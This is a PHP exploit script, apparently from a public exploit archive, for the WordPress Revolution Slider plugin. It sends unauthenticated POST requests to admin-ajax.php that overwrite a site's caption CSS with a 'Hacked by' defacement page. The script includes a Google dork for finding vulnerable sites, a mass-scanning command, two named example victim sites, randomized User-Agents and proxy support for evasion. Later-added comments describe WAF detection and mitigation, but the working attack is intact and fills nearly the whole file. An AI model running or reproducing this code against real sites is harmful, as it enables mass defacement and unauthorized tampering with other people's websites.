
WORDPRESS Revslider Exploit (0DAY)

Author: Cleiton Pinheiro, Published: 26-03-2015
<?php
/*
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

# Exploit Title: WORDPRESS Revslider Exploit (0DAY)
# Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
# EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'


# USE MASS EXPLOIT SCANNER INURLBR
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'

# SCAN: https://github.com/googleinurl/SCANNER-INURLBR
# PRINT: http://i.imgur.com/Fown6vf.png

# Exemples target:
http://victorylakeland.org/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css


*/
// Runtime setup for a long-running CLI job: report only fatal errors (level 1 is E_ERROR),
// remove the execution time limit, and stream output to the terminal as it is produced.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

// Parse command-line options into $op_ and print the banner.
$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\n\n";
// Usage text, shown only when --help is given.
$menu = "
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
// Parameter array handed to __request() / __listTarget().
$params = array(
// A target given without a scheme is prefixed with plain http://.
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
// The list file is only taken into account when no single target was given.
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
// HTML fragment sent as the `data` field of the POST in __request(). Its visible marker text
// ("Hacked by INURL - BRASIL") is a searchable indicator when reviewing stored slider
// caption CSS, cached pages or request bodies captured by a WAF.
'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by INURL - BRASIL ]<br><marque>blog.inurl.com.br<p style='color: transparent'>",
// Separator printed between per-target results.
'line' => "--------------------------------------------------------------"
);
// Stop if both a single target and a list file ended up set.
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
// Single-target mode: one call to __request(), then exit.
not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
// List mode: hand the parameters to __listTarget(), then exit.
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;

/**
 * Tell whether a value is present: neither null nor "empty" by PHP's empty() rules.
 *
 * @param mixed $valor Value to check (defaults to null).
 * @return bool True only for non-null, non-empty values; null, '', '0', 0 and array() all give false.
 */
function not_isnull_empty($valor = NULL) {
    // Null is handled first so the remaining check is just the emptiness test.
    if ($valor === NULL) {
        return FALSE;
    }
    return !empty($valor);
}

/**
 * Push pending output to the terminal: flush PHP's output buffer, then the system write buffer.
 *
 * There is no return statement, so call sites that concatenate the result
 * (`... . __plus()`) append an empty string to whatever is on the left.
 */
function __plus() {

ob_flush();
flush();
}

/**
 * Batch mode: intended to call __request() once for every entry of a target list file.
 *
 * Each listed host receives the same single POST per run, so the traffic this produces is
 * untargeted; on the receiving side it shows up as one probe of admin-ajax.php rather
 * than a sustained session.
 *
 * @param array $file Parameter array built at the top of the script; 'file' holds the list
 *                    path and 'target' is overwritten with each entry before the call.
 */
function __listTarget($file) {
// The whole list is read in one go; the path is not checked for existence or read errors.
$tgt = file_get_contents($file['file']) . __plus();
// Entries are expected one per line, separated by CRLF ("\r\n").
$tgt_ = explode("\r\n", $tgt) . __plus();
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
__plus();
// Reuse the same parameter array (proxy, payload, separator) for every entry.
$file['target'] = $url;
__request($file) . __plus();
}
}

/**
 * Build a pseudo-random User-Agent string from three fixed word lists.
 *
 * The result has the form `<name>/<1-20>.<0-20> (<system> <1-7>.<0-9>; <locale>;)`.
 *
 * Detection note: the value changes on every call, so a single User-Agent string is not a
 * stable key for blocking or correlation. The shape is: there is no `Mozilla/5.0` prefix,
 * and the name and system lists contain entries such as 'B-l-i-t-z-B-O-T', 'Windows 3.1'
 * or 'AmigaOS', so requests can be matched on structure instead of on an exact value.
 *
 * @return string The generated User-Agent header value.
 */
function __setUserAgentRandom() {

// Product names used before the slash.
$agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
);

// Operating-system labels placed inside the parentheses.
$agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
);

// Locale tags; the list mixes hyphenated ('en-US') and underscored ('en_US') forms.
$locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
);
// One random pick per list plus random version numbers, joined into a single header value.
return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}

/**
 * Send one POST to a site's WordPress AJAX endpoint and report whether the reply contains "true".
 *
 * What the request looks like on the wire (useful for log review and WAF rules):
 *   - path: /wp-admin/admin-ajax.php
 *   - fields: action=revslider_ajax_action, client_action=update_captions_css, data=<HTML fragment>
 *   - the fields are passed to cURL as an array, which PHP's cURL sends as multipart/form-data
 *   - no credentials or nonce are supplied; the cookie jar only replays cookies set by the server
 *
 * The request can therefore only succeed where the plugin's handler accepts this
 * client_action from an unauthenticated client. Mitigation is on the plugin side (a
 * capability and nonce check before the update is applied, i.e. running a vendor-patched
 * release); until then, unauthenticated requests carrying this action / client_action pair
 * can be rejected at the web server or WAF.
 *
 * @param array $__ Parameter array with keys 'target', 'proxy', 'deface' and 'line'.
 */
function __request($__) {
$curlxpl = curl_init();
curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
// Optional upstream proxy; when one is used, the source address seen by the site is the proxy's.
(!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
// A fresh randomized User-Agent is generated for every request.
curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
curl_setopt($curlxpl, CURLOPT_POST, 1);
// The action / client_action pair below is the stable part of the request and the best match key.
curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
// TLS certificate and host-name verification are both switched off for this handle.
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
// Cookies are read from and written to cookie.log in the current working directory.
curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
$result = curl_exec($curlxpl) . __plus();
// Success is inferred from a case-insensitive match for "true" anywhere in the response
// body; the stored content is not read back, so a reported hit is not proof of a change.
if (eregi('true', $result)) {
// The get_captions_css action returns the stored captions CSS. Responders can compare that
// output with a known-good copy to confirm whether a site's stored value was altered.
$h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
echo "[!] [INFO] Success Exploit!\n";
echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
__plus();
// Reported hits are appended to revslider.txt in the current working directory.
file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
} else {
echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
}
curl_close($curlxpl);
unset($curlxpl);
}
